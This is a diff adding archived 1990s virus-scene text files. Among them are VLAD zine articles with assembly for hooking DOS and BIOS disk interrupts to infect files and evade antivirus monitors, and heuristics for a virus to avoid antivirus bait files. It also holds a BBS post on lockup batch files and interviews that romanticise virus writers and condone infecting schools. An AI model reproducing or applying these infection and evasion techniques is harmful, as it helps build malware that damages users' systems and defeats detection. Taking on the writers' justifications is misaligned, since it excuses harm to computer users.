VIRUS: ------------------------- The FIRST non boot-block +virus! This one is murder! Since it does not attach itself to the +boot block it is not a simple think to find. This baby attacks the +FIRST executable file in your startup-sequence or,if it can't get at +that file, it will attack the DIR command in your C directory! Get +and read the fine writeup of this virus by S.Tibbett included with his +VIRUSX utility. + +Anyway....the saga continues...... +I highly recommend that you get a copy of Steve Tibbett's excellent +utility, VIRUSX (the current version as of 9/16/89 is VIRUSX3.20 ). +This fine utility detects all 16 known viruses and kills them on the +disk and in RAM. The built-in sector-viewer allows you to see the +virus on the disk and to also observe any unusual boot block code. + diff --git a/textfiles.com/virus/backdoor.txt b/textfiles.com/virus/backdoor.txt new file mode 100644 index 00000000..fdff9017 --- /dev/null +++ b/textfiles.com/virus/backdoor.txt @@ -0,0 +1,162 @@ + + + Backdoors! + +--------+ Qark/VLAD + + + The information in this article concerns the backdoors in MS-DOS and + BIOS that can be used and abused by a virus for it's own ends! Most + of them concern the Int21h DOS services interrupt and Int13h Disk + services. + + Int40h - The floppy disk handler gets relocated to Int40h by the Hard + disk BIOS and is called by Int 13h. Int40h can be hooked and + used to infect floppy disks. Be cautious when using this + because if no harddisk is present it isn't set. + + Int30h - This is not infact an interrupt at all. It is a far jump + to the original interrupt 21h handler that is stored at + the address of int30h. It was originally used for the CP/M + emulation in earlier versions of DOS and remains there today. + If you look at the PSP information, at PSP:[5] is a 'call + to the DOS function dispatcher'. It actually calls the int30h + we are talking about (but due to a microsoft stuff up it misses + by two bytes). There are two ways of using this backdoor, the + first way could be for a really hard method for infection or a + good destructive payload. You can use it directly by calling + it in an unusual fashion. This function could be messed up by + some programs but I have yet to see it not work anywhere. + Thanx go out to John Switzer for supplying me for this + information although I'm sure he wouldn't appreciate it's + use! :) + + Method One: + You can only use DOS functions AH=0 to 24h with this and + any functions that require AL can't be used. + + Int21h Proc Near + ;Call this from your code with the same parameters + ; as the real DOS int 21h function. + ;Truly weird I'm sure you'll agree! + + mov cl,ah ;It uses CL. + mov ax,offset return_addr ;Stack is backwards + push ax + push cs + pushf ;Flags are last!! + + db 0eah ;JMP FAR PTR + dw 0c0h ;30h * 4 + dw 0 ;Interrupt table. + return_addr: + ret ;Back to user. + Int21h EndP + + Method Two: + This is different in that it uses the segment:offset + address of the Int30h to get the original 'proper' Int21h + that we are all used to. This method is used by the + writers of the MG virus (who also wrote creeping death, + very talented and good researchers!) Anyway you can work + that out yourself, thats why it's called research! + + Int2fh - When DOS gets loaded it hooks int13h and saves the original + ah=13h addresses for its own use. When this function is called it + returns two addresses where one is slightly closer to the + original int13h than the other, but I'm not too sure which is + the closer of the two (they are often equal). If you play + with this yourself look it up in Ralf Brown's, you can probably + point the DOS calls to your virus if you do it right. + + To grab the original int13h without messing up DOS: + + mov ah,13h + int 2fh ;Get the int13h's + + push es ;Save them + push ds + push dx + push bx + + int 2fh ;Put them back to what they were. + + pop bx ;Now we've got our handlers. + pop dx + pop ds + pop es + + ;From here you can either choose to use ES:BX or DS:DX + ;as your int13h. + + Seg70h - Segment 70h is used by DOS. All DOS disk access passes through + it at sometime. All you have to do is scan through it for + the bytes of the different calls. This method was first + used by the Creeping Death virus and is used in the 1984 + (listed as 'ignorant' by CARO) and Daemon viruses. I'd + suggest running through this with a debugger and having a + look to work out what's going on. DOS has been using 70:B4 + to store the original Int 13h since DOS 3.3. + + mov ax,70h + mov ds,ax + mov si,2 + first_backdoor: + or si,si + jz wherever + + dec si ;SI-1 + lodsw ;DS:[SI] to AX SI+2 + + cmp ax,1effh ;FF1E = CALL FAR PTR [xxxx] + jnz first_backdoor + + cmp word ptr [si],0b4h ;This is just there :) + jnz first_backdoor + + jmp set_fake_int13 ;We've found it! + + set_fake_int13h: + mov si,[si] ;SI=Where the address is + ;stored. + ;save the int13h into the virus + mov cs:orig_store,word ptr [si] + mov cs:orig_store+2,word ptr [si+2] + ;point it to our virus + mov word ptr [si],offset our_int13 + mov word ptr [si+2],cs + + ;ret or whatever... + + Int2fh - Have a look at this interrupt in Ralf Browns (a must for every + virus programmer) it can do ALL the interrupt 21h functions! + The only problem is working out the DOS stacks and so + on. It is handy for bypassing AV monitors, but it is much + too huge to go into in any detail. + + BIOS - Within BIOS lurk a number of stationary entry points to + entry interrupts. There are a few problems with these, as alot + points of BIOSes are incompatible and QEMM won't work with them + but they can be useful because there isn't ANYTHING that + can be done to stop it. + + Here are a list of addresses that are guaranteed not to + work half the time but have a look anyway. + + F000:EC59 Floppy disk int 13h + F000:F859 Int 15h, sometimes useful + + Int2ah - This is called by Int 21h on every file related function. By + ah=82h modifying the stack or certain registers you can change the + function that was called to whatever you want. DOS stores + the function multiplied by two in BL (eg Int 21h AH=40h will + be BL=80h when the int 2ah is called.). If you change this + BL to another function it should fool most AV monitors. This + may only work for some versions of DOS. + + Int21h - If you call this service you can do any DOS function. Have a + ax=5d00h look! All you have to do is set your registers up in a table. + It should be easy to write a basic simulated int21h using + this. + + Anymore ? Not that I can think of! If you know any... tell me!! + diff --git a/textfiles.com/virus/baitdet.txt b/textfiles.com/virus/baitdet.txt new file mode 100644 index 00000000..c2b57534 --- /dev/null +++ b/textfiles.com/virus/baitdet.txt @@ -0,0 +1,174 @@ + + + Advanced bait detection + + by CoKe/VLAD + + + + Introduction: + + + Bait files are the files the AV create to get them infected by a virus, + to check out his behaviour, his polymorphism, and last but not least to + debug it. Usually these files are pretty small, and only contain a few + instructions (i.e. Printing a message). As soon as they start infecting + hundreds (maybe thousands) of baits, they'll find out everything about + the virus. So to give them a real hard time doing their jobs, every + virus should in one way or another be able to recognize those files. + + There are many possible ways of detecting bait files; most of them are + covered by the article 'Resist!' which you can find in this issue as well. + Since I suppose you don't want to read all that stuff twice, I will just + leave it out of my article. + + In this article I will cover another way of detecting bait files: + code-analysis, bait-heuristics to say so, and after checking out tons + of executables, here's what I found out: + + + + + + 1 - COM Baits + + + Detecting COM baitfiles is a bit difficult, since you really have to + check out the code (in EXE's you can analyse the header aswell, but + the informations below are still true for them). Since bait files are + usually pretty small, best way to do it is to check the first 2048 + (or even 4096) bytes for some specific constructions. Below are + listed a few things that mostly happen in bait files. Of course it's + no 100% detection, but if some of these criteria are fulfilled together, + it's better to make your virus ignore that file. + + + - Check for massive use of INC/DEC structures (there's no point in + increasing a register right after decreasing it :)) + + i.e. : INC AX + DEC AX + INC BX + DEC BX + etc. + + + - Check for a huge amount of NOP's (especially after jumps), since in + "normal" COM files, there are few or no NOP's at all. + + i.e. : JMP 110 + NOP + NOP + NOP + NOP + NOP + etc. + + Also check for huge amounts of 00h bytes after jumps. + + + - Check if the first instructions are a + mov ah, 4Ch + int 21h sequence (same for ret) + or if the first instruction jumps to such a routine. + + + - Check for zero jumps (E90000h, EB00h etc.); again, in "normal" programs, + usually there are no zero jumps. + + + - Check for jumps to jumps. Of course this can happen in any COM file, but + if you have a jump to a jump along with tons of NOP's, you can be sure + there are wierd things going on. + + + - Also check for calls to a ret, as this is meaningless code too. + + + As I said, on their own, none of these criteria are useful. But combined + they give kinda a bait-heuristic, and it depends on you, how you + consider the matches. A file that matches even 3 of these criteria is + suspicious in my eyes. + + + + + 2 - EXE Baits + + + + As for EXE baits, the above is still true. In addition to all that, we + have the EXE-header that can help us. + + - Most bait files don't have a stack! + To check this out, just compare CS with SS and SP with IP. If they both + match there is no stack, which is quite uncommon for EXE's. + + + + EXE header structure + + + + Offset Description Size + 00 Signature 1 word 'MZ' or 'ZM' + 02 Last Page Size 1 word + 04 File Pages 1 word + 06 Items 1 word + *08 Header Paras 1 word + 0A MinAlloc 1 word + 0C MaxAlloc 1 word + 0E SS 1 word< Compare CS + 10 SP 1 word< to SS and + 12 Negative checksum 1 word IP to SP! + *14 IP 1 word< + *16 CS 1 word< + 18 Reloc table offset 1 word + + ( [*] These are needed to calculate the entry point of the EXE. ) + + + An EXE file with no stack is definitely to be distrusted! + + + + + For the further code-analysis, you gotta analyse the code at the + entry point, and _NOT_ the code after the header! This is a bit more + complicated than for the COM's, but once you got the entry point + (file offset of the code at CS/IP), it's the same as for COM files. + Unfortunately you won't find the entry point anywhere in the header. + To get it, you must use the following formula: + + + ((CS + Header Para's) * 16) + IP + + (See EXE header structure above) + + + Example: + mov ax, word ptr cs:[exeheader + 16h] ; This loads the CS + ; to AX + add ax, word ptr cs:[exeheader + 08h] ; Add the header + ; para's to CS + mov dx, 10h + mul dx ; Multiply by 16 + add ax, word ptr cs:[exeheader + 14h] ; Add the IP + + + This leaves the entry point in AX. Now all you need to do is to set the + filepointer to the calculated address, and there you go... + + + Final words: + + + By respecting the ideas mentioned in 'Resist!', and adopting some of these + techniques, you can be pretty sure to give the AV a hard time, unless you + want your latest virus in any AV software 2 days after it was released! :) + + + + + + diff --git a/textfiles.com/virus/batvirus.txt b/textfiles.com/virus/batvirus.txt new file mode 100644 index 00000000..8c9d52d9 --- /dev/null +++ b/textfiles.com/virus/batvirus.txt @@ -0,0 +1,22 @@ +Date: 9:47 pm Thu Nov 4, 1993 Number : 18 of 33 +From: XXXXXXXXXXXXXXX Base : Virus Discussion +To : XXXXXXXXXXXXXXX Refer #: 11 +Subj: Re: Pas Viruii Replies: None +Stat: Normal Origin : Local + +XX> creating batch file virii. If you're not all to hot in programming, batch +XX> files can be loads of fun. :) + +good call. the most simple batch i can think of is umm two batch files: + +@echo off + +:t1 + t2 + +:t2 + t1 + + +put t1 in the autoexec and it locks up each time. unless you load from a:drive +which is another reason im trying to fuck up the cmos on a puter. diff --git a/textfiles.com/virus/bbinterv.iew b/textfiles.com/virus/bbinterv.iew new file mode 100644 index 00000000..cfbb6776 --- /dev/null +++ b/textfiles.com/virus/bbinterv.iew @@ -0,0 +1,393 @@ + + ANATOMY OF A VIRUS AUTHOR + + + A biography of The Black Baron + + + By + + + Matthew Probert + + + + +In 1969 Neil Armstrong stepped onto the moon. It was a momentous year for the +world. But no-one at the time paid much attention to a baby boy being born in +a town in southern England. This baby boy was destined to grow into one of the +most infamous computer virus writers of all time. In 1969 The Black Baron was +born! + +The Black Baron never set out to become a computer virus writer. He left +school at sixteen with a handful of CSE's and a burning desire to be a +commercial airline pilot. He enjoyed swimming and science fiction comedy +shows, such as Red Dwarf, and did all the things that any normal, healthy +young man would do. He learnt to drive, passed his driving test and settled +down to several years unemployed. + +He is at pains to point out that he is not a thug, he does not have any +criminal convictions; + +"I don't even have a point on my driving licence" he laughs, when asked about +criminal activities. + +And yet what inspires a normal, healthy, well balanced young man to create the +ultimate in computer terrosism, a polymorphic computer virus? + +In examining Black Baron's motives one must consider his state of mind. Is he +a shy, withdrawn individual who has problems with inter-personal relationships +perhaps? No is the answer. He is not the cliche of a computer programmer. He +owns a single second-hand Tandon 286 PC with an Amstrad monitor, and a rather +old and modest modem. + +"I don't even like computer programming!" he says when asked about it. + +Perhaps however he is upset by his unemployment? An individual with his +obvious and undeniable talent must surely feel some resentment at being +unemployed. But he doesn't blame the computer industry directly, he certainly +does resent the "old school tie" attitude which is so prevalent in England +today, and he blames the Conservative government for doing much to reinforce +this approach to employment. + +"I don't wear the right colour tie" he says. + +The inspiration to create a computer virus came to Black Baron after he read +Ross M. Greenberg's comments about computer virus authors. Mr Greenberg, the +American author of an anti-virus product called "Flu Shot" is very scathing +and critical of people who write computer viruses. Indeed the introduction to +the instruction manual which accompanies Flu Shot is preoccupied with +questioning the emotional stability of the people who write computer viruses. +I quote: + + Introduction + + What is a Trojan? + ================= + + Back in the good old days (before there were computers), there + was this bunch of soldiers who had no chance of beating a + superior force or of even making it into their fortress. They + had this nifty idea: present the other side with a gift. Once + the gift had been accepted, soldiers hiding within the gift would + sneak out and overtake the enemy from within. + + We can only think of the intellectual giants of the day who would + accept a gift large enough to house enemy soldiers without + checking its contents. Obviously, they had little opportunity to + watch old WWII movies to see the same device used over and over + again. They probably wouldn't have appreciated Hogan's Heroes + anyway. No color TV's -- or at least not ones with reliable + reception. + + Consider the types of people who would be thrilled at the concept + of owning their own rough hewn, large wooden horse! Perhaps they + wanted to be the first one on their block, or something silly + like that. + + Anyway, you're all aware of the story of The Trojan Horse. + + Bringing ourselves a bit closer to the reality we've all grown to + know and love, there's a modern day equivalent: getting a gift + from your BBS or user group which contains a little gem which + will attack your hard disk, destroying whatever data it contains. + + In order to understand how a potentially useful program can cause + such damage when corrupted by some misguided soul, it's useful to + understand how your disk works, and how absurdly easy it is to + cause damage to the data contained thereon. So, a brief + technical discussion of the operation of your disk is in order. + For those who aren't concerned, turn the page or something. + + Data is preserved on a disk in a variety of different physical + ways having to do with how the data is encoding in the actual + recording of that data. The actual *structure* of that data, + however, is the same between MS-DOS machines. Other operating + systems have a different structure, but that doesn't concern us + now. + + Each disk has a number of "tracks". These are sometimes called + cylinders from the old type IBMer's. These are the same people + who call hard disks DASDs (Direct Access Storage Devices), so we + can safely ignore their techno-speak, and just call them tracks. + Tracks can be thought of as the individual little grooves on an + audio record, sort of. + + Anyway, each track is subdivided into a number of sectors. Each + track has the same number of sectors. Tracks are numbered, as + + are sectors. Any given area on the disk can be accessed if a + request is made to read or write data into or out of Track-X, + Sector Y. The read or write command is given to the disk + controller, which is an interface between the computer itself and + the hard disk. The controller figures out what commands to send + to the hard disk, the hard disk responds and the data is read or + written as directed. + + The first track on the hard disk typically will contain a small + program which is read from the hard disk and executed when you + first power up your machine. The power up sequence is called + "booting" your machine, and therefore the first track is typical + known as the "boot track". + + In order to read information from your disk in a logical + sequence, there has to be some sort of index. An unusual index + method was selected for MS-DOS. Imagine going to the card index + in a library, looking up the title you desire, and getting a + place in another index which tells you where on the racks where + the book is stored. Now, when you read the book, you discover + that only the first chapter of the book is there. In order to + find the next chapter of the book, you have to go back to that + middle index, which tells you where the next chapter is stored. + This process continues until you get to the end of the book. + Sounds pretty convoluted, right? You bet! However, this is + pretty much how MS-DOS does its "cataloguing" of files. + + The directory structure of MS-DOS allows for you to look up an + item called the "first cluster". A cluster represents a set of + contiguous ("touching or in contact" according to Random House) + tracks and sectors. It is the smallest amount of information + which the file structure of MS-DOS knows how to read or write. + + Based on the first cluster number as stored in the directory, the + first portion of a file can be read. When the information + contained therein is exhausted, MS-DOS goes to that secondary + index for a pointer to the next cluster. That index is called + the File Allocation Table, commonly abbreviated to "FAT". The + FAT contains an entry for each cluster on the disk. An FAT entry + can have a few values: ones which indicate that the cluster is + unused, another which indicates that the associated cluster has + been damaged somehow and that it should be marked as a "bad + cluster", and a pointer to the next cluster for a given file. + This allows for what is called a linked list: once you start + looking up clusters associated with a given file, each FAT entry + tells you what the next cluster is. At the end of the linked + list is a special indicator which indicates that there are no + more clusters associated with the file. + + There are actually two copies of the FAT stored on your disk, but + no one really knows what the second copy was intended for. + Often, if the first copy of the FAT is corrupted for some reason, + a clever programmer could recover information from the second + copy to restore to the primary FAT. These clever programmers can + be called "hackers", and should not be confused with the thieves + + who break into computer systems and steal things, or the "worms" + [Joanne Dow gets credit for *that* phrase!] who would get joy out + of causing you heartache! + + But that heartache is exactly what can happen if the directory + (which contains the pointer to the first cluster a file uses), + the FAT (which contains that linked list to other areas on the + disk which the file uses), or other areas of the disk get + corrupted. + + And that's what the little worms who create Trojan programs do: + they cause what at first appears to be a useful program to + eventually corrupt the important parts of your disk. This can be + as simple as changing a few bytes of data, or can include wiping + entire tracks clean. + + Not all programs which write to your hard disk are bad ones, + obviously. Your word processor, spreadsheet, database and + utility programs have to write to the hard disk. Some of the DOS + programs (such as FORMAT), if used improperly, can also erase + portions of your hard disk causing you massive amounts of grief. + You'd be surprised what damage the simple "DEL" command can do + with just a simple typo. + + But, what defines a Trojan program is its delivery mechanism: the + fact that you're running something you didn't expect. Typical + Trojan programs cause damage to your data, and were designed to + do so by the worms who writhe in delight at causing this damage. + May they rot in hell -- a mind is a terrible thing to waste! + + Considering the personality required to cause such damage, you + can rest assured that they have few friends, and even their + mother doesn't like to be in the same room with them. They sit + back and chortle about the damage they do with a few other lowly + worms. This is their entire social universe. You should pity + them. I know that I do. + + What is a Virus? + ================ + + Trojan programs are but a delivery mechanism, as stated above. + They can be implemented in a clever manner, so that they only + trigger the malicious part on a certain date, when your disk + contains certain information or whatever. However they're coded, + though, they typically affect the disk only in a destructive + manner once triggered. + + A new breed of programs has the capability of not only reserving + malicious damage for a given event's occurrence, but of also + replicating itself as well. + + This is what people refer to when they mention the term "Virus + Program". + + Typically, a virus will spread itself by replicating a portion of + itself onto another program. Later, when that normally safe + program is run it will, in part, execute a set of instructions + which will infect other programs and then potentially, trigger + the Trojan portion of the program contained within the virus. + + The danger of the virus program is twofold. First, it contains a + Trojan which will cause damage to your hard disk. The second + danger is the reason why everyone is busy building bomb shelters. + This danger is that the virus program will infect other programs + and they in turn will infect other programs and so forth. Since + it can also infect programs on your floppy disks, you could + unknowingly infect other machines! Pretty dangerous stuff, + alright! + + Kenneth van Wyck, one of the computer folks over at Lehigh + University, first brought a particular virus to the attention of + the computer community. This virus infects a program, which + every MS-DOS computer must have, called COMMAND.COM. This is the + Command Line Interpreter and is the interface between your + keyboard and the MS-DOS operating system itself. Whatever you + type at the C: prompt will be interpreted by it. + + Well, the virus subverts this intended function, causing the + infection of neighboring COMMAND.COMs before continuing with + normal functionality of the command you typed. After a certain + number of "infections", the Trojan aspect of the program goes + off, causing you to lose data. + + The programmer was clever. But still a worm. And still + deserving of contempt instead of respect. Think of what good + purposes the programmer could have put his or her talents to + instead of creating this damage. And consider what this + programmer must do, in covering up what they've done. They + certainly can't tell anyone what they've accomplished. + Justifiable homicide comes to mind, but since the worms they must + + hang around are probably as disreputable as they are, they must + hold their little creation a secret. + + A pity. Hopefully, the worm is losing sleep. Or getting a sore + neck looking behind them wondering which of their "friends" are + gonna turn them in for the reward I list towards the end of this + document. + + The Challenge to the Worm + ========================= + + When I first released a program to try to thwart their demented + little efforts, I published this letter in the archive (still in + the FLU_SHOT+ archive of which this is a part of). What I say in + it still holds: + + As for the designer of the virus program: most + likely an impotent adolescent, incapable of + normal social relationships, and attempting to + prove their own worth to themselves through + these type of terrorist attacks. + + Never succeeding in that task (or in any + other), since they have no worth, they will one + day take a look at themselves and what they've + done in their past, and kill themselves in + disgust. This is a Good Thing, since it saves + the taxpayers' money which normally would be + wasted on therapy and treatment of this + miscreant. + + If they *really* want a challenge, they'll try + to destroy *my* hard disk on my BBS, instead of + the disk of some innocent person. I challenge + them to upload a virus or other Trojan horse to + my BBS that I can't disarm. It is doubtful the + challenge will be taken: the profile of such a + person prohibits them from attacking those who + can fight back. Alas, having a go with this + lowlife would be amusing for the five minutes + it takes to disarm whatever they invent. + + Go ahead, you good-for-nothing little + slimebucket: make *my* day! + + + Alas, somebody out there opted to do the cowardly thing and to + use the FLUSHOT programs as a vehicle for wrecking still more + destruction on people like you. The FLUSHOT3 program was + redistributed along with a companion program to aid you in + reading the documentation. It was renamed FLUSHOT4. And the + reader program was turned into a Trojan itself. + + I guess the programmer involved was too cowardly to take me up on + my offer and prefers to hurt people not capable of fighting back. + I should have known that, I suppose, but I don't normally think + of people who attack innocents. Normally, I think of people to + respect, not people to pity, certainly not people who must cause + such damage in order to "get off". + + They are below contempt, obviously, and can do little to help + themselves out of the mire they live in. + + Still, a worm is a worm. + + +Insensed by what he saw as the narrow, biggoted attitude of the author, our +young man, then twenty four years old, decided to write a program which would +infect other other computer programs and more than that. One which would with +each infection change its form so as to avoid detection by Flu Shot and other +virus scanners. At christmas 1993, Pathogen was completed. One month later +SMEG 0.1 was included and the first SMEG virus hit the computer world. + +In Febuary 1994 Black Baron, as the author was calling himself, released a +subsequent computer virus. Queeg. This time he updated the polymorphic engine +(SMEG) into version 0.2. + +Shortly aftwerwards the Thunderbyte anti-virus software underwent a major new +release, with verion 6.20 which in fairness detects 96% of SMEG version 0.1 +and version 0.2 infections. Unfortunately, the author's of Thunderbyte suffer +from the same arrogance as Mr Greenberg. They have widely boasted that their +new virus scanner can detect any polymorphic viruses. Needless to say this is +seen as a challenge by Black Baron. And being an Englishman, he can't resist a +challenge. It is not surprising to learn then, that as I write this in June +1994 Black Baron is just finishing off SMEG version 0.3 which is completely +undetectable by any current virus scanner, including Thunderbyte release 6.20. + +I ask myself when is this is all going to end? Perhaps when computer users +become sufficiently educated to be able to use the equipment at their +disposal. Perhaps when computers stop attracting social inadequates, but whom +I am refering to the arrogant members of the anti-virus lobby as well as the +nefarious virus authors. But what of the Black Baron? What is he? Is he a +malicious criminal? A computer terrorist? A social inadequate trying to +reassure himself of his own inadequacies through destroying computer data? I +don't belive so. I have spoken to Black Baron on a number of occassions. He is +happy to discuss his work, and, at my request, he has even released a document +detailing the design of SMEG. He doesn't feed on the panic and fear that SMEG +viruses such as Pathogen and Queeg cause. Rather he revels in the +embarrasement and panic which his software causes the arrogant anti-virus +writers. + +It is quite questionable whether Black Baron was sensible in taking this +course of action. It does appear that he has adopted a "I'll show you" +attitude. But it is equally obvious that the real villian is the person who +caused the trouble in the first place, Mr Greenberg and his arrogant and +biggoted view. You still don't believe me? Okay, as a finale let me say this. +Black Baron knows that I write anti-virus software. He knew this before he +gave me an interview. And knowing that I write anti-virus software he provided +me with the source code of Pathogen, Queeg and SMEG so that I might improve my +anti-virus software. He even supplied me with software which creats safe SMEG +encrypted programs for testing purposes. These are not the actions of a mad +man. These are the actions of a man who just wants to be respected for what he +is. A damn hot programmer. + +After talking with him, I understand the Black Baron. I feel sorry for him as +well. He is a highly gifted individual who has not been given a chance by +computer society. So he has made his own chance. We all need recognition. +Mainly through employment, but we as thinking machines must receive +recognition for our abilities. Otherwise we sink into melancholy and +paranoida. Black Baron has received his recognition. We, the computer society +are responsible for the creation of Pathogen, Queeg, SMEG and all the other +computer viruses. We have no one to blame but ourselves. It is our desire to +keep the computer fraternity a closed club which has alienated so many of our +colleagues. By rubbing their noses in it, so to speak, we have begged for +trouble, and like the inhabitants of Troy, we have received it. + +Matthew Probert +Servile Software diff --git a/textfiles.com/virus/bdinterv.iew b/textfiles.com/virus/bdinterv.iew new file mode 100644 index 00000000..0e86ecf5 --- /dev/null +++ b/textfiles.com/virus/bdinterv.iew @@ -0,0 +1,445 @@ +=====================[ BLONDE INTERVIEW ]======================================= + +This interview was done quite some time ago (When Blonde still was an +independant novice viruswriter), but since I want you to know the new +members of Immortal Riot, I decided to include it anyhow. + +The story why Blonde (then using another handle), became a member of +the virus community was bcos he got hit by a destructive virus I made +for IR#5 and wanted to know how to protect himself against those evil +programs :). He ended up being a member of the group which crashed his +harddrive. + +TU = The Unforgiven +BL = Blonde + +TU> Give me a short description of who you are? + (real name/ID-number/phone#/adress/age :)) + +BL> John Doe / 01-12-23/ 0123-456 78 / 54 Unknown St. / 18 + +TU> From where did you get you handle, Blonde? + +BL> From one of Quentin Tarantinos movies, Reservoir Dogs. One of the main + characters is called Mr. Blonde + +TU> Does your handle has some specific meaning? + +BL> The character Mr. Blonde is kind of cruel... guess I'm cruel too;) + +TU> When did you discovered the world of computers? + +BL> That was around the age of, erh..., 11 or 12 or something like it... + +TU> How long have you been active in the scene? + +BL> Depends on wich scene... I haven't been active in the virus scene for + more than a year, or maybe one and a half..something like it, I don't + count days... + +TU> Why did you start to call boards and such things? + +BL> Well first I was just astonished that I could use a modem to + comunicate with other persons then I got into the wareZ scene and + discovered that one could get hold of alot of intresting softw. but + that didn't last long... but it was still the main reason I started + calling boards. + (* side note... I don't know why but it seems like the warez scene is + where all ppl start out, but then move on to the scene that really fits + them. end side note *) + +TU> How did you come into the virus business? + +BL> Well I guess I just wanted to learn more about viruses, mainly for + protective purposes. As some of you guys know I didn't bother about + viruses until I got hit by Bad Attitude... (* This is a very + funny story, indeed - TU *) then I started to look at virus-code and + though it woul be cool to be able to write one by myself and well after + a period of trial and error I succeeded and realised I'd found my niche. + +TU> Why did you start to write viruses? + +BL> Because they intrigued me... they attracted me and to some extent to + make something those warez-puppies feared like hell... + +TU> Which goals do you have as a viruswriter? + +BL> To make the perfect virus... would be nice ;) naah well I set my goals + in a closer future as for now I'm aiming to do a multipartite. It + might even be included in this mag.. who knows? + after that I'll probebly try to combine all my knowledge in a + multipartite with full stealth or something like it... + (* This has now been sorta done.. *) + +TU> What programming-languages are you familiar with, and whats your + favourite language? + +BL> I'm a descent pascal programmer. I was my first programming language + and I've done tons of apps in it. I'm also familiar with C and trying + to teach myself C/C++ at the moment... and asm ofcourse. + + Since I started using asm I've realised that it's far more powerful + atleast if it's not too _big_ apps. so nowadays I mainly use asm for + everything... + +TU> How many viruses have you written? + +BL> gee... I dunno... not so many I guess. I think I've _finished_ about 5 + or so.. they're easy to count though... one non-ow, one res com, one + enc res com, one res com/exe and then s4 + +TU> How do you name your viruses? + +BL> That depends... Something that has a meaning to me... or something + that sounds good... Salamander Four for example was nicked from a book + by Peter O'Donnel where S4 is the name of a crime-syndicate... + +TU> What motivates you to write viruses? + +BL> The learning process... mainly and the kick when you've succeeded with + something you haven't done before. thats a thrill.. + +TU> Did some of them carried a destructive payload? + +BL> I've written destructive payloads, yes... but up to date I haven't + spread my viruses so I've never included any payloads at all + +TU> Do you think you will continue to write viruses? + +BL> Yes, until I get fed up with them, but that will hopefully take + time... + +TU> Whould you feel guilty if one of your viruses made damage to a + hospital, and someone got harmed bcos of that? + +BL> Probably... I don't know since it hasn't happened... but I think I + would... thats why I prefere non-destructive payloads... + +TU> Would you deliberate infect a school or government institution if you + know they would replicate well if you did so? + +BL> Yes.. schools and govermental institutions wouldn't be a problem at + all, because a virus can't do anyone physical harm through them... + +TU> Do you find it easier to infect pirated software (which is illegal to + use), than PD/SW software? + +BL> That doesn't bother me at all... software is software... I just add my + piece of code... it doesn't change the function of the program... BUT + if I infect pirate software that would probably be because I would like + my virus to spread... pd/sw doesn't travel as fast as pirated software + does... + +TU> Do you encourage deliberate destructive code in viruses? + +BL> It doesn't bother me as long as it isn't my HD you're nukin'... but I + prefer funny payloads... + +TU> Have you considered writing destructive code in viruses? + +BL> Oh yes. I've considered it... I'll probably end up including + destructive code in some viruses, just to get attention ;) + +TU> What to you think of the issue concerning 'undestructive-viruses'? + +BL> They're harmless as long as the remover (the person who removes them) + knows what to do and that may be a plus since most ppl. wouldn't get as + pissed off when struck by an undestructive virus... + +TU> Do you think one can make a virus benefictial? + +BL> Maybe... I've had that though really... I just tend to see viruses as + a piece of code... or artificial life ;) + +TU> Have you ever considered writing a GOOD virus? + +BL> I would be more than happy to write a good virus since it then might + be more appreciated for the programming skill it took to write it + and not rejected by the fact that the viruses are seen as evil... + +TU> Gonthev described in his 'write-up' "Is good Computer-Viruses still + a bad idea?". Do you think it's possible to write a GOOD virus, which + serves a useful task, and at the same time, solves all problems that + he described? + +BL> It might be possible to write a _good_ virus BUT I'm not sure I would + consider viruses good, since it is so easy to loose control over it... + say for example you use one to encrypt your HD. what would your friend + think if his hd got encrypted? + + It might be possible to write what you and I consider a good virus, + but there is always someone who'll disagree with you. + +TU> About virus-code-generators, what is your opinion about them, and + about people using them thinking they are hot-shot-3liT333? + +BL> I consider people using code-generators as the worst virus-writer + wannabes. I really think they should try to write their own code, + because it's not that hard really... it just takes practise. + + Though code-generators are good for some people (like me ;)). I + actually learned a great deal from G2 and my first virus actually + looked very much like a G2 generated virus, but I wouldn't want to + release that source ;) On the other hand. To create a generator is a + good way to prove oneself as a good virus writer, because it takes a + lot of skill to do so... + +TU> Do you write viruses to get recognition in the virus/AV community? + +BL> To some extent yes, because I'm not going to get any recognition + from the users that get hit by my viruses ;) + + But the recognition isn't that important. whats important is the fact + that I succeeded in creating the virus, that is by itself really + enough for me... + +TU> What do you think about the media/AV describing viruswriters as + lonely individuals with no life? + +BL> Haha... thats probably the biggest lie of them all! I'm having a + hard time finding enough time to write viruses because I've got + a very busy social life. + +TU> Do you think the scene is associal or not? + +BL> Thats a hard question... It's quite hard to get into the community, + ie. finding a board, making friends and learning... but once you're + in it's the best scene around! + + It's easier if you've got access to internet and irc though... you + meet alot of real good coders on irc and they're all willing to help + you out... + +TU> How are you in real life? + +BL> Hehe.. I'm a party animal... I just love parties it's just too bad my + wallet doesn't... I guess I'm just another normal guy, but with intresest + in viruses. + +TU> How do you make your living? + +BL> I don't. I'm still studying. + (* Notice, now Blonde also works for the same company as our + sysop, The Wizard does. He earns a lot of money, but spends + it all on Camel's (ciggs) and booze. - TU *) + +TU> Have the scene/viruswriting influent you in real life? + +BL> My opinion on viruses has changed a great deal... I've lost most of + my respect for them ie. my fear... ;) but my knowledge in viruses has + made me the av'er of the school when it gets hit... it might be because + I always know which virus it is... usually mine ;). + +TU> What do your parents/close friends think about your viruswriting? + +BL> My parents don't know, but I doubt that they would care. It's my + choice, they can't stop me and they know it... they might disagree + but since they're very realistic they wouldn't try or anything... + most of my friends aren't aware of the fact that I write viruses, + some of them do and I'm trying to get one of them to start + writing. (* Movitz :-), Monica's little darling, hahhahah! *) (NBL) <- Rb's secret comment ;> (don't tell ne1) + +TU> Why havn't you told your parents about your activity in the + virus arena? + +BL> If they asked I would tell them if I thought it would change my + relationship with them, but I generally don't go around telling people + that I'm writing viruses because of the bad reputation viruses have got. + People tend to look at virus writers with disgust and thats not what + I'm looking for so I don't tell them... + +TU> Are you only into viruswriting or other parts of the + computer-underground as well? + +BL> I'm at the moment deep into viruses, but hacking is also an option if + virus writing gets boring. Well you could also probably add pirating + to the list since I don't have the money too buy the software I need... + but if I did I would probably stop, because programmers deserve + the money. Although most programmers at Microsoft don't ! + +TU> What in the scene do you find okay to do, and what dont you do bcos + you find it morally wrong? + +BL> Board trashing is morally wrong... it might be a lame sysop but he + has spent hours and hours setting the board up so let him be... + +TU> What parts of the underground do you think needs improvements? + +BL> The information exchange... most people just poll nets they don't + share.. + +TU> Whats your opinion about polymorphic engines? + +BL> Okey to use for the author, but for anyone else it would be like a + using a code-generator... + +TU> Why do you think people won't use them? (other than the inventors?) + +BL> Because those who use code-generators are happy with that and often + not 